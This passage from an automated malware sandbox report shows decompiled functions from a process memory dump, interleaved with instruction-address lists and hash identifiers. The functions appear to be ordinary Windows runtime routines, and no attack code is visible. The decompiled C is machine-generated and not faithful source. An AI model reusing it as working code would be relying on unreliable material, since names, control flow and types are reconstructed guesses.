							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E010E9910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E010E95D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1197b9c; // 0x0
									_t92 = L010C4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E010E9910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E010AA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0113E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0113E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E010E95B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                          0x0113b8d9
                                          0x0113b8e4
                                          0x00000000
                                          0x0113b8e6
                                          0x0113b8f3
                                          0x0113b8f5
                                          0x0113b8f5
                                          0x0113b8f8
                                          0x0113b920
                                          0x0113b924
                                          0x0113b936
                                          0x0113b939
                                          0x0113b93d
                                          0x0113b948
                                          0x0113b9a0
                                          0x0113b9a0
                                          0x0113b9a4
                                          0x0113b9bf
                                          0x0113b9c4
                                          0x0113b9c6
                                          0x0113b9cd
                                          0x0113b9d1
                                          0x0113bad4
                                          0x0113bad8
                                          0x0113bada
                                          0x0113badc
                                          0x0113badc
                                          0x0113badf
                                          0x0113bae0
                                          0x0113bae2
                                          0x0113bae4
                                          0x0113baec
                                          0x0113baee
                                          0x0113baf0
                                          0x0113baf0
                                          0x0113baec
                                          0x0113bafb
                                          0x0113bafc
                                          0x0113bafe
                                          0x0113bb01
                                          0x0113bb01
                                          0x00000000
                                          0x0113bb06
                                          0x0113b9d7
                                          0x0113b9db
                                          0x0113b9db
                                          0x0113b9de
                                          0x0113b9de
                                          0x0113b9e4
                                          0x0113b9e7
                                          0x0113b9ea
                                          0x0113b9ec
                                          0x0113b9ef
                                          0x0113b9f3
                                          0x0113ba1b
                                          0x0113ba1b
                                          0x0113ba23
                                          0x0113ba24
                                          0x0113ba27
                                          0x0113ba2a
                                          0x0113ba2b
                                          0x0113ba2e
                                          0x0113ba30
                                          0x0113ba37
                                          0x0113ba3f
                                          0x0113ba9c
                                          0x0113baa2
                                          0x0113bb13
                                          0x0113bb15
                                          0x0113baae
                                          0x0113baae
                                          0x0113bab3
                                          0x0113bab5
                                          0x0113baba
                                          0x0113bac8
                                          0x0113bac8
                                          0x0113baba
                                          0x0113bacd
                                          0x0113bacf
                                          0x00000000
                                          0x0113bacf
                                          0x0113bb1a
                                          0x00000000
                                          0x0113bb1c
                                          0x0113baa7
                                          0x0113bb11
                                          0x00000000
                                          0x0113bb11
                                          0x0113baa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0113ba41
                                          0x0113ba41
                                          0x0113ba41
                                          0x0113ba58
                                          0x0113ba5d
                                          0x0113ba62
                                          0x00000000
                                          0x00000000
                                          0x0113ba64
                                          0x0113ba67
                                          0x0113ba68
                                          0x0113ba69
                                          0x0113ba6c
                                          0x0113ba6f
                                          0x0113ba71
                                          0x0113ba78
                                          0x0113ba80
                                          0x00000000
                                          0x00000000
                                          0x0113ba90
                                          0x0113ba90
                                          0x0113ba97
                                          0x00000000
                                          0x0113ba97
                                          0x0113b9f5
                                          0x0113b9f7
                                          0x0113b9f7
                                          0x0113b9fa
                                          0x0113ba03
                                          0x0113ba07
                                          0x0113ba0c
                                          0x0113ba10
                                          0x0113ba17
                                          0x00000000
                                          0x0113b9f7
                                          0x0113b9a6
                                          0x0113b9a8
                                          0x0113b9af
                                          0x0113b9b3
                                          0x00000000
                                          0x00000000
                                          0x0113b9b9
                                          0x00000000
                                          0x0113b9b9
                                          0x0113b94d
                                          0x0113b98f
                                          0x0113b995
                                          0x0113b999
                                          0x0113b960
                                          0x0113b967
                                          0x0113b968
                                          0x0113b96a
                                          0x00000000
                                          0x0113b96a
                                          0x0113b99b
                                          0x0113b99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0113b99e
                                          0x0113b951
                                          0x0113b954
                                          0x0113b95a
                                          0x0113b95e
                                          0x0113b972
                                          0x0113b979
                                          0x0113b97d
                                          0x0113b97f
                                          0x0113b980
                                          0x0113b982
                                          0x0113b984
                                          0x00000000
                                          0x0113b984
                                          0x00000000
                                          0x0113b926
                                          0x00000000
                                          0x0113b926

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cc6e11a65a831126b4349377be8b0283eca5566bd84a89bef1236e471679fd3
                                          • Instruction ID: 784888acdda789088e8b69379f878252a8a5c2c1f698d596af74c75199bd4be9
                                          • Opcode Fuzzy Hash: 8cc6e11a65a831126b4349377be8b0283eca5566bd84a89bef1236e471679fd3
                                          • Instruction Fuzzy Hash: 1A712272204B02EFE73ACF19C844F96BBE5EF80720F114528E695872A8FB71E945CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01126DC9 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E01126DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01126B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E010C7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E010E9AE0();
					_t87 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0112795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0112795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0112795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0112795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L010C4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01126B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01126B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01126B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01126B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E010C7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E010E9AE0();
								L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L010C2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L010C2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L010C2400( &_v52);
							}
							if(_v28 >= 0) {
								return L010C2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                          0x01126dd4
                                          0x01126dde
                                          0x01126de1
                                          0x01126de3
                                          0x01126de6
                                          0x01126de9
                                          0x01126dec
                                          0x01126def
                                          0x01126df2
                                          0x01126df5
                                          0x01126dfe
                                          0x01126e04
                                          0x01126e09
                                          0x01126e0d
                                          0x01126e18
                                          0x01126e1b
                                          0x01126e22
                                          0x01126e2d
                                          0x01126e30
                                          0x01126e36
                                          0x01126e42
                                          0x01126e4d
                                          0x01126e50
                                          0x01126e55
                                          0x01126e5c
                                          0x01126e6e
                                          0x01126e5e
                                          0x01126e67
                                          0x01126e67
                                          0x01126e73
                                          0x01126e74
                                          0x01126e77
                                          0x01126e7c
                                          0x01126e7d
                                          0x01126e8e
                                          0x01126e93
                                          0x01126e9c
                                          0x01126ea8
                                          0x01126eab
                                          0x01126eac
                                          0x01126eb3
                                          0x01126ecd
                                          0x01126edc
                                          0x01126ee2
                                          0x01126ee5
                                          0x01126ef2
                                          0x01126efb
                                          0x01126f01
                                          0x01126f06
                                          0x01126f0b
                                          0x01126f11
                                          0x01126f1a
                                          0x01126f22
                                          0x01126f26
                                          0x01126f26
                                          0x01126f33
                                          0x01126f41
                                          0x01126f44
                                          0x01126f47
                                          0x01126f54
                                          0x01126f65
                                          0x01126f77
                                          0x01126f7c
                                          0x01126f82
                                          0x01126f91
                                          0x01126f99
                                          0x01126fa3
                                          0x01126fae
                                          0x01126fae
                                          0x01126fba
                                          0x01126fbb
                                          0x01126fbc
                                          0x01126fc1
                                          0x01126fc2
                                          0x01126fd3
                                          0x01126fd8
                                          0x01126fd8
                                          0x01126fdf
                                          0x01126fe8
                                          0x01126fee
                                          0x01126fee
                                          0x01126ff5
                                          0x01126ffb
                                          0x01126ffb
                                          0x01127004
                                          0x00000000
                                          0x0112700a
                                          0x01127004
                                          0x01126eb3
                                          0x01126e9c
                                          0x01127015

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: b986489bcab33228af15b200afb02792884f8c9e31ba033d0785ae867ae32b14
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: AC718F71A00219EFCB15DFA9C984EEEBBB9FF58714F104069E905E7290DB34EA51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A52A5 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010A52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E010BEEF0(0x11979a0);
					_t104 =  *0x1198210; // 0xb52c58
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E010BEB70(_t93, 0x11979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E010E9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E010BEEF0(0x11979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E010BEB70(0, 0x11979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xb52c65
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E010DF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E010BEEF0(0x11979a0);
									__eflags =  *0x1198210 - _t104; // 0xb52c58
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1198210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01124888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E010BEB70(_t95, 0x11979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010E95D0();
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E010E95D0();
											L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E010BEB70(_t93, 0x11979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E010E95D0();
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E010DF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                          0x010a52a5
                                          0x010a52ad
                                          0x010a52b0
                                          0x010a52b3
                                          0x010a52b7
                                          0x010a52ba
                                          0x010a52bf
                                          0x010a52c4
                                          0x010a52cc
                                          0x00000000
                                          0x00000000
                                          0x010a52ce
                                          0x010a52d9
                                          0x010a52dd
                                          0x010a52e7
                                          0x010a52f7
                                          0x010a52f9
                                          0x010a52fd
                                          0x01100dcf
                                          0x01100dd5
                                          0x01100dd6
                                          0x01100dd7
                                          0x01100dd8
                                          0x01100dd9
                                          0x01100dde
                                          0x01100ddf
                                          0x01100de0
                                          0x01100de1
                                          0x01100de2
                                          0x01100de5
                                          0x01100dea
                                          0x01100dec
                                          0x01100f60
                                          0x01100f64
                                          0x01100f70
                                          0x01100f76
                                          0x01100f79
                                          0x01100f79
                                          0x00000000
                                          0x01100f64
                                          0x01100df2
                                          0x01100df7
                                          0x01100e04
                                          0x01100e0d
                                          0x01100e0d
                                          0x01100e10
                                          0x01100e1a
                                          0x01100e1c
                                          0x01100e4c
                                          0x01100e52
                                          0x01100e61
                                          0x01100e67
                                          0x01100e6b
                                          0x01100e70
                                          0x01100e76
                                          0x01100ed7
                                          0x01100edc
                                          0x01100ee0
                                          0x01100ee6
                                          0x01100eea
                                          0x01100eed
                                          0x01100ef0
                                          0x01100ef3
                                          0x01100ef6
                                          0x01100ef9
                                          0x01100efe
                                          0x01100f01
                                          0x01100f01
                                          0x01100f0b
                                          0x01100f12
                                          0x01100f16
                                          0x01100f18
                                          0x01100f1b
                                          0x01100f2c
                                          0x01100f31
                                          0x01100f31
                                          0x01100f35
                                          0x01100f39
                                          0x01100f3a
                                          0x01100f3c
                                          0x01100f3f
                                          0x01100f50
                                          0x01100f55
                                          0x01100f55
                                          0x01100f59
                                          0x010a52eb
                                          0x010a52f1
                                          0x010a52f1
                                          0x01100e7d
                                          0x01100e84
                                          0x01100e88
                                          0x01100e8a
                                          0x01100e8d
                                          0x01100e9e
                                          0x01100ea3
                                          0x01100ea3
                                          0x01100ea7
                                          0x01100eaf
                                          0x01100eb3
                                          0x01100eb9
                                          0x01100eb9
                                          0x01100ebc
                                          0x01100ecd
                                          0x01100ecd
                                          0x00000000
                                          0x01100eb3
                                          0x01100e21
                                          0x01100e2b
                                          0x01100e2f
                                          0x01100e30
                                          0x01100e3a
                                          0x01100e3f
                                          0x01100e41
                                          0x00000000
                                          0x00000000
                                          0x01100e47
                                          0x00000000
                                          0x01100e47
                                          0x01100df9
                                          0x01100dfe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01100dfe
                                          0x010a5303
                                          0x010a5307
                                          0x00000000
                                          0x010a5309
                                          0x00000000
                                          0x010a5309
                                          0x010a5307
                                          0x010a52e9
                                          0x010a52e9
                                          0x00000000
                                          0x010a52e9
                                          0x010a530e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d130da4d4da9856166c7411253a2c0b4f5f3269311fd1d4f4528f3c49997e7b8
                                          • Instruction ID: 675dbde6c12d7eac504375e7224a4f112a2a7004d9e759146f213ce031aa19ad
                                          • Opcode Fuzzy Hash: d130da4d4da9856166c7411253a2c0b4f5f3269311fd1d4f4528f3c49997e7b8
                                          • Instruction Fuzzy Hash: 9F51BD711053429BD726EF68C845BABBBE4FF94710F14091EF4E587691E7B0E844CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D2AE4 Relevance: .2, Instructions: 159COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1198204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1198208; // 0x1198207
				_t8 = _t57 + 0x1198208; // 0x1198207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1198450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x119821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1196d5c; // 0x7f620654
							_t72 =  *0x1196d5c; // 0x7f620654
							_t75 =  *0x1196d5c; // 0x7f620654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1196d5c; // 0x7f620654
							_t84 =  *0x1196d5c; // 0x7f620654
							_t87 =  *0x1196d5c; // 0x7f620654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E010EF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                          0x010d2ae4
                                          0x010d2aec
                                          0x010d2aef
                                          0x010d2af4
                                          0x010d2af7
                                          0x010d2afd
                                          0x010d2b92
                                          0x010d2b92
                                          0x010d2b97
                                          0x010d2b9c
                                          0x010d2b9c
                                          0x010d2b03
                                          0x010d2b06
                                          0x010d2b09
                                          0x010d2b09
                                          0x010d2b0f
                                          0x010d2b15
                                          0x010d2b15
                                          0x010d2b1b
                                          0x010d2b1e
                                          0x010d2b21
                                          0x010d2b26
                                          0x010d2b29
                                          0x010d2b81
                                          0x010d2b84
                                          0x010d2c0e
                                          0x010d2c15
                                          0x010d2c24
                                          0x010d2c24
                                          0x010d2b8a
                                          0x010d2b8a
                                          0x010d2b8a
                                          0x010d2b8a
                                          0x010d2b90
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010d2b4a
                                          0x010d2b4a
                                          0x010d2b4d
                                          0x010d2b53
                                          0x00000000
                                          0x00000000
                                          0x010d2b55
                                          0x010d2b58
                                          0x010d2bb7
                                          0x01115d1b
                                          0x01115d37
                                          0x01115d47
                                          0x01115d53
                                          0x010d2bbd
                                          0x010d2bbd
                                          0x010d2bbd
                                          0x010d2bb7
                                          0x010d2b5d
                                          0x010d2c2f
                                          0x01115d5b
                                          0x01115d77
                                          0x01115d87
                                          0x01115d93
                                          0x010d2c35
                                          0x010d2c35
                                          0x010d2c35
                                          0x010d2c2f
                                          0x010d2b65
                                          0x010d2b9f
                                          0x010d2ba2
                                          0x010d2b67
                                          0x010d2b67
                                          0x010d2b69
                                          0x010d2b6b
                                          0x010d2b6e
                                          0x010d2bc9
                                          0x010d2bcc
                                          0x010d2bcf
                                          0x010d2bd4
                                          0x010d2bd6
                                          0x010d2bd6
